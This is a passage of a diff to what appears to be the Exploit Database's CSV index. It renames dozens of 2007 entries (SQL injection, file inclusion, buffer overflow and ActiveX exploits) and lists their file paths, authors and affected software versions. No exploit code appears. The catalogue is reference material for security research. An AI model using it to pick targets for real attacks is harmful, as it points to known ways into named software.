3937,platforms/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 Remote Denial of Service Exploit",2007-05-16,shinnai,windows,dos,0 3938,platforms/windows/remote/3938.html,"PrecisionID Barcode ActiveX 1.9 Remote Arbitrary File Overwrite Exploit",2007-05-16,shinnai,windows,remote,0 3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 @@ -3651,7 +3651,7 @@ id,file,description,date,author,platform,type,port 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0 3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure Vulnerability",2007-05-28,GoLd_M,php,webapps,0 -4000,platforms/php/webapps/4000.txt,"WAnewsletter <= 2.1.3 Remote File Inclusion Vulnerability",2007-05-28,Mogatil,php,webapps,0 +4000,platforms/php/webapps/4000.txt,"wanewsletter <= 2.1.3 - Remote File Inclusion Vulnerability",2007-05-28,Mogatil,php,webapps,0 4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2",2007-05-28,"Thomas Pollet",windows,local,0 4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 @@ -3670,7 +3670,7 @@ id,file,description,date,author,platform,type,port 4016,platforms/windows/remote/4016.sh,"Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 4017,platforms/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 Local Buffer Overflow PoC",2007-05-31,n00b,windows,dos,0 4019,platforms/php/webapps/4019.php,"Particle Gallery <= 1.0.1 Remote SQL Injection Exploit",2007-06-01,Silentz,php,webapps,0 -4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 +4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0 4023,platforms/windows/remote/4023.html,"IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 @@ -3712,14 +3712,14 @@ id,file,description,date,author,platform,type,port 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta Remote Command Execution PoC",2007-06-12,"Thor Larholm",windows,remote,0 4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 -4063,platforms/php/webapps/4063.txt,"XOOPS Module TinyContent 1.5 Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0 -4064,platforms/php/webapps/4064.txt,"XOOPS Module Horoscope <= 2.0 Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0 +4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0 +4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0 4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)",2007-06-13,rgod,windows,remote,0 4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)",2007-06-13,rgod,windows,remote,0 4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)",2007-06-13,"YAG KOHHA",windows,dos,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability",2007-06-13,Sp[L]o1T,php,webapps,0 4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability",2007-06-13,g00ns,php,webapps,0 -4070,platforms/php/webapps/4070.txt,"XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability",2007-06-13,g00ns,php,webapps,0 +4070,platforms/php/webapps/4070.txt,"xoops module cjay content 3 - Remote File Inclusion Vulnerability",2007-06-13,g00ns,php,webapps,0 4071,platforms/php/webapps/4071.txt,"Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability",2007-06-14,o0xxdark0o,php,webapps,0 4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability",2007-06-14,o0xxdark0o,php,webapps,0 4074,platforms/php/webapps/4074.txt,"phpMyInventory 2.8 (global.inc.php) Remote File Inclusion Vulnerability",2007-06-16,o0xxdark0o,php,webapps,0 @@ -3731,25 +3731,25 @@ id,file,description,date,author,platform,type,port 4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit",2007-06-19,Silentz,php,webapps,0 4082,platforms/php/webapps/4082.pl,"LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 Remote SQL Injection Vulnerability",2007-06-20,Crackers_Child,asp,webapps,0 -4084,platforms/php/webapps/4084.txt,"XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability",2007-06-20,GoLd_M,php,webapps,0 +4084,platforms/php/webapps/4084.txt,"xoops module wiwimod 0.4 - Remote File Inclusion Vulnerability",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 Remote File Inclusion Vulnerabilities",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) <= 1.9.6 Remote File Inclusion Exploit",2007-06-20,Kw3[R]Ln,php,webapps,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 (htmledit.php) Remote File Inclusion Vulnerability",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities",2007-06-22,GoLd_M,php,webapps,0 -4092,platforms/php/webapps/4092.txt,"NetClassifieds (SQL/XSS/Full Path) Multiple Remote Vulnerabilities",2007-06-22,"laurent gaffiĂ© ",php,webapps,0 +4092,platforms/php/webapps/4092.txt,"netclassifieds (sql/xss/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffiĂ© ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 (index.php ID) Remote SQL Injection Vulnerability",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 -4097,platforms/php/webapps/4097.txt,"DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability",2007-06-24,Katatafish,php,webapps,0 +4097,platforms/php/webapps/4097.txt,"dagger web engine <= 23jan2007 - Remote File Inclusion Vulnerability",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload Vulnerability",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability",2007-06-24,"laurent gaffiĂ© ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll v. 2.6.2.157) Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability",2007-06-25,Rf7awy,php,webapps,0 -4103,platforms/php/webapps/4103.txt,"BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 +4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 (sql/xss) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) Remote SQL Injection Vulnerability",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 (ShowImage.php name) File Disclosure Vulnerability",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 @@ -3801,7 +3801,7 @@ id,file,description,date,author,platform,type,port 4153,platforms/php/webapps/4153.txt,"phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities",2007-07-06,t0pP8uZz,php,webapps,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll v. 2.1.0.556) SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 -4156,platforms/php/webapps/4156.txt,"LimeSurvey (PHPSurveyor) 1.49RC2 Remote File Inclusion Vulnerability",2007-07-06,"Yakir Wizman",php,webapps,0 +4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion Vulnerability",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 (profile id) Remote SQL Injection Vulnerability",2007-07-07,Xenduer77,php,webapps,0 @@ -3910,24 +3910,24 @@ id,file,description,date,author,platform,type,port 4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo (.spr file) Buffer Overflow Exploit",2007-08-06,n00b,windows,local,0 4264,platforms/cgi/webapps/4264.txt,"CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility",2007-08-06,t0pP8uZz,php,webapps,0 -4266,platforms/multiple/remote/4266.py,"BIND 9 DNS Cache Poisoning Exploit (v0.3beta)",2007-08-07,posedge,multiple,remote,0 +4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability",2007-08-07,kezzap66345,php,webapps,0 -4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability",2007-08-07,kezzap66345,php,webapps,0 +4269,platforms/php/webapps/4269.txt,"frontaccounting 1.12 build 31 - Remote File Inclusion Vulnerability",2007-08-07,kezzap66345,php,webapps,0 4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 4271,platforms/php/webapps/4271.txt,"FishCart <= 3.2 RC2 (fc_example.php) Remote File Inclusion Vulnerability",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service Exploit",2007-08-09,"Martin Kluge",windows,dos,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 (archive.php) Remote File Inclusion Vulnerability",2007-08-09,k1n9k0ng,php,webapps,0 4274,platforms/windows/local/4274.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)",2007-08-09,Inphex,windows,local,0 4275,platforms/php/webapps/4275.php,"Php Blue Dragon CMS 3.0.0 Remote SQL Injection Exploit",2007-08-10,Kacper,php,webapps,0 -4276,platforms/php/webapps/4276.txt,"Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability",2007-08-10,Kacper,php,webapps,0 +4276,platforms/php/webapps/4276.txt,"php blue dragon cms 3.0.0 - Remote File Inclusion Vulnerability",2007-08-10,Kacper,php,webapps,0 4277,platforms/php/webapps/4277.php,"Php Blue Dragon CMS 3.0.0 Remote Code Execution Exploit",2007-08-10,Kacper,php,webapps,0 4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 (pixlie.php root) Remote File Disclosure Vulnerability",2007-08-10,Rizgar,php,webapps,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 4280,platforms/windows/remote/4280.pl,"Savant 3.1 Get Request Remote Overflow Exploit (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x SIP Phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP <= 3.5RC9 (file) Remote File Disclosure Vulnerability",2007-08-13,dun,php,webapps,0 -4283,platforms/windows/remote/4283.pl,"Racer v0.5.3 beta 5 Remote Buffer Overflow Exploit",2007-08-13,n00b,windows,remote,26000 +4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 beta 5 - Remote Buffer Overflow Exploit",2007-08-13,n00b,windows,remote,26000 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script (category.php cat) Remote SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x SIP phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest Web Login Bypass SQL Injection Vulnerability",2007-08-14,s4squatch,cgi,webapps,0 @@ -4058,8 +4058,8 @@ id,file,description,date,author,platform,type,port 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 (login.php) Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 -4415,platforms/php/webapps/4415.txt,"Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability",2007-09-15,Morgan,php,webapps,0 -4416,platforms/php/webapps/4416.txt,"Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability",2007-09-16,Morgan,php,webapps,0 +4415,platforms/php/webapps/4415.txt,"joomla component flash fun! 1.0 - Remote File Inclusion Vulnerability",2007-09-15,Morgan,php,webapps,0 +4416,platforms/php/webapps/4416.txt,"joomla component joom12pic 1.0 - Remote File Inclusion Vulnerability",2007-09-16,Morgan,php,webapps,0 4417,platforms/php/webapps/4417.txt,"SimpCMS <= all (keyword) Remote SQL Injection Vulnerability",2007-09-16,"Cold Zero",php,webapps,0 4418,platforms/php/webapps/4418.sh,"Omnistar Article Manager Software (article.php) SQL Injection Exploit",2007-09-16,"Cold Zero",php,webapps,0 4419,platforms/php/webapps/4419.php,"Shop-Script FREE <= 2.0 Remote Command Execution Exploit",2007-09-17,InATeam,php,webapps,0 @@ -4067,7 +4067,7 @@ id,file,description,date,author,platform,type,port 4421,platforms/php/webapps/4421.txt,"phpsyncml <= 0.1.2 Remote File Include Vulnerabilities",2007-09-18,S.W.A.T.,php,webapps,0 4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module Remote SQL Injection Vulnerability",2007-09-18,Houssamix,php,webapps,0 4423,platforms/php/webapps/4423.txt,"modifyform (modifyform.html) Remote File Inclusion Vulnerability",2007-09-18,mozi,php,webapps,0 -4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS Remote Exploit PoC",2007-09-18,"Aviv Raff",windows,remote,0 +4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit PoC",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit",2007-09-18,nexen,php,webapps,0 4426,platforms/hardware/dos/4426.pl,"Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC",2007-09-18,"Alex Hernandez",hardware,dos,0 4427,platforms/windows/remote/4427.html,"jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 @@ -4084,7 +4084,7 @@ id,file,description,date,author,platform,type,port 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit",2007-09-21,axis,windows,remote,25 4439,platforms/php/webapps/4439.txt,"neuron news 1.0 (index.php q) Local File Inclusion Vulnerability",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla Component com_slideshow Remote File Inclusion Vulnerability",2007-09-21,ShockShadow,php,webapps,0 -4441,platforms/php/webapps/4441.txt,"iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities",2007-09-21,irk4z,php,webapps,0 +4441,platforms/php/webapps/4441.txt,"izicontents <= rc6 (rfi/lfi) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 Remote Code Execution Vulnerability",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability",2007-09-22,IHTeam,php,webapps,0 4444,platforms/php/webapps/4444.txt,"Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability",2007-09-22,VerY-SecReT,php,webapps,0 @@ -4106,9 +4106,9 @@ id,file,description,date,author,platform,type,port 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerability",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 (repertoire) Remote File Inclusion Vulnerability",2007-09-27,0in,php,webapps,0 -4463,platforms/php/webapps/4463.txt,"IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability",2007-09-27,"Mehmet Ince",php,webapps,0 +4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion Vulnerability",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion Vulnerability",2007-09-28,w0cker,php,webapps,0 -4465,platforms/php/webapps/4465.txt,"Public Media Manager <= 1.3 Remote File Inclusion Vulnerability",2007-09-28,0in,php,webapps,0 +4465,platforms/php/webapps/4465.txt,"public media manager <= 1.3 - Remote File Inclusion Vulnerability",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 Remote SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 @@ -4132,30 +4132,30 @@ id,file,description,date,author,platform,type,port 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog Remote SQL Injection Vulnerability",2007-10-05,CyberGhost,asp,webapps,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 -4489,platforms/php/webapps/4489.txt,"Joomla panoramic component 1.0 Remote File Inclusion Vulnerability",2007-10-06,NoGe,php,webapps,0 -4490,platforms/php/webapps/4490.txt,"ELSE IF CMS 0.6 Multiple Remote Vulnerabilities / Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 +4489,platforms/php/webapps/4489.txt,"joomla panoramic component 1.0 - Remote File Inclusion Vulnerability",2007-10-06,NoGe,php,webapps,0 +4490,platforms/php/webapps/4490.txt,"else if cms 0.6 Multiple Vulnerabilities / exploit",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion (securite.php) Remote File Inclusion Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 4492,platforms/php/webapps/4492.txt,"Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability",2007-10-07,"HACKERS PAL",php,webapps,0 4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component RFI Vulnerability",2007-10-07,"Mehmet Ince",php,webapps,0 -4497,platforms/php/webapps/4497.txt,"Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability",2007-10-07,NoGe,php,webapps,0 +4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion Vulnerability",2007-10-07,NoGe,php,webapps,0 4498,platforms/windows/dos/4498.pl,"wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 -4499,platforms/php/webapps/4499.txt,"Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability",2007-10-08,k1n9k0ng,php,webapps,0 -4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 Multiple Remote Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 +4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion Vulnerability",2007-10-08,k1n9k0ng,php,webapps,0 +4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability",2007-10-08,IRCRASH,php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 Remote Code Execution Exploit",2007-10-09,BlackHawk,php,webapps,0 4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 -4507,platforms/php/webapps/4507.txt,"Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability",2007-10-10,NoGe,php,webapps,0 +4507,platforms/php/webapps/4507.txt,"joomla component mp3 allopass 1.0 - Remote File Inclusion Vulnerability",2007-10-10,NoGe,php,webapps,0 4508,platforms/php/webapps/4508.txt,"Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 Remote PHP Injection Vulnerability",2007-10-10,ShAnKaR,php,webapps,0 4510,platforms/php/webapps/4510.txt,"Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 category.php Remote SQL Injection Exploit",2007-10-10,ka0x,php,webapps,0 -4512,platforms/php/webapps/4512.txt,"NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability",2007-10-10,BiNgZa,php,webapps,0 +4512,platforms/php/webapps/4512.txt,"nuseo php enterprise 1.6 - Remote File Inclusion Vulnerability",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit",2007-10-10,EgiX,php,webapps,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling Remote BoF Exploit",2007-10-10,bangus/magnum,linux,remote,0 4515,platforms/solaris/local/4515.c,"Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 @@ -4167,7 +4167,7 @@ id,file,description,date,author,platform,type,port 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 -4524,platforms/php/webapps/4524.txt,"Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0 +4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,IRCRASH,php,webapps,0 @@ -4189,7 +4189,7 @@ id,file,description,date,author,platform,type,port 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability",2007-10-17,S.W.A.T.,php,webapps,0 4545,platforms/php/webapps/4545.txt,"awzMB <= 4.2 beta 1 Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 -4546,platforms/php/webapps/4546.txt,"ZZ FlashChat <= (help.php) 3.1 Local File Inclusion Vulnerability",2007-10-19,d3hydr8,php,webapps,0 +4546,platforms/php/webapps/4546.txt,"ZZ FlashChat <= 3.1 - (help.php) Local File Inclusion Vulnerability",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 Remote Blind SQL Injection Exploit",2007-10-20,"Michael Brooks",php,webapps,0 4548,platforms/php/webapps/4548.php,"Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit",2007-10-20,InATeam,php,webapps,0 4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 @@ -4206,7 +4206,7 @@ id,file,description,date,author,platform,type,port 4560,platforms/multiple/dos/4560.pl,"DNS Recursion bandwidth amplification Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 Remote Command Execution / Privilege 